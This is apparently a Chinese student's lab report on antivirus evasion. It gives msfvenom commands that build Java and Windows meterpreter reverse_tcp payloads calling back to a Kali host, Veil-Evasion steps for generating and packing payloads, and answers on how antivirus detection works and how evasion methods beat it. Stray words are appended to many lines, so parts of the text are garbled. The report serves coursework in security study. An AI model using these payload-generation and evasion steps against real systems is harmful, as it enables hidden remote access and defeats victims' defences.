msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.150.138(kali ip) lport=5220 x> 5220_backjar.jar
,首先咱们先对veil-evasion进行安装,详情可参考老师博客java
安装好以后,咱们利用veil
,指令打开veil-evasion
shell
依次用use evasion
,list payloads
,进入到payloads模板界面编程
随便选择一个模板,将其复制,而后输入use 5
(你所复制的模板)windows
而后输入set LHOST kali-ip
,set LPORT 5220
对其进行配置,而后输入generate
,生成。安全
首先咱们输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.150.138 LPORT=443 -f c
网络
进行回连,回连成功tcp
回连成功
加密
进行检测,如图3d
加壳后我发现了加壳后的病毒文件较以前未加壳更容易被查杀,但我发现了其中有的杀毒软件在病毒文件加壳后反而未能识别出来,而加壳后有些新的杀毒软件反而可以识别了,这我就不知所因了。code
1.杀软是如何检测出恶意代码的?
基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对便可判断是不是恶意代码。
.基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,若是有敏感行为会被认为是恶意程序,是一种动态的监测与捕捉。
2.免杀是作什么?
3.免杀的基本方法有哪些?
改变特征码
对exe可执行文件加壳:压缩壳 加密壳
基于payload从新编译生成可执行文件
本次实验过程颇为曲折,首先在下载veil过程当中没法安装,再三尝试后只得拷了一个虚拟机; 而后对shellcode代码更改后,回连出现了失败,在组长的指导下顺利解决了该问题。 经过本次实验,忽然发现稍稍修改病毒就能够骗过好多杀毒软件,让我对如今电脑的安全性有了从新的审视; 最后我仍是赶忙去给电脑杀毒了。